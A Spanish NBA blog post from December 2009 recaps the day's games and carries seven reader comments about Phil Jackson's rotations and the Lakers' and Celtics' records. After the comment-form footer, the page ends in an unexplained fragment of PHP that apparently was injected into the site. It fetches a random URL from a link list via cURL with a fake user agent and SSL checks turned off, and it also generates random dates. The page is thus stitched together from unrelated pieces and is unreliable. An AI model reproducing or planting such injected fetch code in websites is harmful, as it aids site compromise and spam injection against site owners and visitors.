La Minicrónica (26/12/2009)

27 de December de 2009 por TheDeerHunter

Dicen que las vacaciones son para descansar pero la verdad es que estos días hay de todo menos tiempo libre y el poco que tenemos lo utilizamos para digerir los festines que nuestras madres y abuelas nos preparan. Así que hoy tendréis que conformaros con un mini relato de la jornada.

En Sacramento, los Lakers le vieron de nuevo las orejas al lobo. De hasta dos prórrogas y, como no, del mejor hacer de Kobe y Pau necesitaron para doblegar a los Kings. Pesaron excesivamente el extraño viaje escaleras abajo en su casa de Ron Artest y el nuevo mal partido de Bynum. En cualquier caso salieron airosos y Tyreke Evans aprendió lo que significa jugarse el partido mano a mano contra Kobe.

En todo caso los perseguidores de los Lakers en el Oeste tampoco es que estén para tirar cohetes. Los Mavs también sufrieron para ganar a los Grizzlies en el American Airlines, y los Suns se dieron un batacazo tremendo en Oackland con un espectacular duelo Monta vs Nash. Pero mal andan las cosas si Anthony Randolph le gana la partida a Stoudamire y Maggette de 4 te hace una destroza como si del mismo Duncan se tratara.

Sí hicieron sus deberes los Spurs y los Jazz, contra los Bucks y los Sixers respectivamente, y sin demasiados problemas además. También los Rockets contra los Nets pero con muchas más dificultades de lo previsto. Además hubo rebote de T-Mac y se avecina tormenta en el equipo de Adelman.  En cambio, los Hornets se vieron sorprendidos en Chicago ante el brutal regreso de Tyrus Thomas.

Finalmente los Hawks ganaron a los Pacers, los Thunder a los Bobcats y los Wolves a los Wizards.

Comenta

7 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Si alguién sigue creyendo que los Lakers están en un buen momento de forma, o está ciego o es un fanático de L.A. Sigo sin entender las no-rotaciones de Jackson, si yo fuera el coach, hubiera preferido dar minutos a Morrison, Vujacic y Cia, aunque hubiese perdido el partido, antes que tener a mi 3 hombres claves jugando 50 minutos, y otros dos 40. Y ya van enésimas noches en que pasa esto. Cuando Pau se lesione, que le echen la culpa por haber jugado en Polonia.

    ¿Por qué no habéis puesto lo del MVP, esfuerzo en vano, etc? Bueno pues MVP para Coggey Magette.

    Vaya partidazo también el de Durant.

      Citar

  2. Txusma dice:
    #2

    Pues pq hay días (sobretodo fines de semana) que no tenemos tiempo… Se aceptan colaboraciones 😉

      Citar

  3. Lagarto dice:
    #3

    Completamente de acuerto con LOVE una vez más. No seré yo quién le discuta nada al señor de los anillos pero no acabo de entender que no rote nada de nada…así los va a machacar y cuando tenga que tirar de ellos en play-off van a estar machacados. A Morrison ni se le ha visto en la temporada en el parquet y cuando lo necesiten no va a saber ni jugar a esto. Mientras se nota claramente que por ejemplo a Shaq, o a Garnett le están reservando en Cleveland o Boston por poner dos ejemplos y el físico de Lebron es de superdotado con lo que no creo que tenga problemas llegado un play-off. ¿Alguien me puede decir a qué se debe esto, más allá de decirme que si no ponen a los titulares en LA pierden los partidos?

      Citar

  4. jonatan dice:
    #4

    la temporada de ellis me recuerda a la del año pasado de granger la diferencia es que el no irá al all star y ira otra gente mas “mediatica”…

      Citar

  5. David dice:
    #5

    Estoy de acuerdo con algunos de vosotros en que estan exprimiendo demasiado a los pilares del equipo, es evidente.
    Pero en cuanto a los vaticinios de cansancio extremo, de llegar machacados a PO y eso… bueno, otros años creo que los exprimieron de forma similar, y ahí estuvieron. Por ejemplo, Pau el año pasado fue el que más jugó en Lakers, más incluso que Kobe, y bueno, no parece que le pasara factura en las finales

      Citar

  6. TheDeerHunter dice:
    #6

    Los Lakers con Gasol llevan 16 victorias y 2 derrotas. Casi un 90%, proyección de 70 victorias… tranquilamente más de 65.
    Estoy poco o nada preocupado con el nivel actual del equipo. El Oeste tiene un nivel medio muy alto… no tanto los gallos, pero los Kings están jugando muy bien, como también los Thunder. No es ningún pecado padecer en un partido regular contra este tipo de equipos. Y no serán los únicos que lo hagan.
    Contra Cleveland se puede perder. Cuesta asimilar que te den un baño como ese, pero también se lo dió Dallas… y el año pasado no quiero recordar lo que pasó con Orlando en los dos choques de regular. Los Lakers pueden permitirse no matarse por ese tipo de partidos porque su camino por la regular va a ser un paseo (no como el de los Cavs, Celtics o Magic)

    Con respecto a los minutos… el año pasado yo era de los que más preocupados estaban con la minutada de Pau Gasol. Él dijo algo y Phil casi lo excomulga. Después llegó a playoffs como llegó, comiéndose vivo a quien se le puso por delante…

    No perdamos el norte con ese tema. El año pasado a estas alturas sí se había perdido en Sacramento.

      Citar

  7. PIRATA dice:
    #7

    Comparativa Boston/Lakers con todos lo partidos perdidos y los ganados con equipos de entidad, veo mucha igualdad quiza solo que boston ha perdido tres partidos con equipos menores mientras que Lakers no:

    PERDIDOS GANADOS FECHA
    BOSTON CLE 27-oct
    PHX 06-nov
    UTH 11-nov
    ATL 13-nov
    IND 14-nov
    ORL 20-nov
    MIA 29-nov
    SAS 03-dic
    PHI 18-dic
    ORL 25-dic
    LAC 27-dic

    PERDIDOS GANADOS DATA
    LAKERS DAL 30-oct
    ATL 01-nov
    HOU 04-nov
    PHX 12-nov
    DEN 13-nov
    HOU 15-nov
    MIA 04-dic
    PHX 06-dic
    UTA 09-dic
    UTA 12-dic
    CLE 25-dic

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>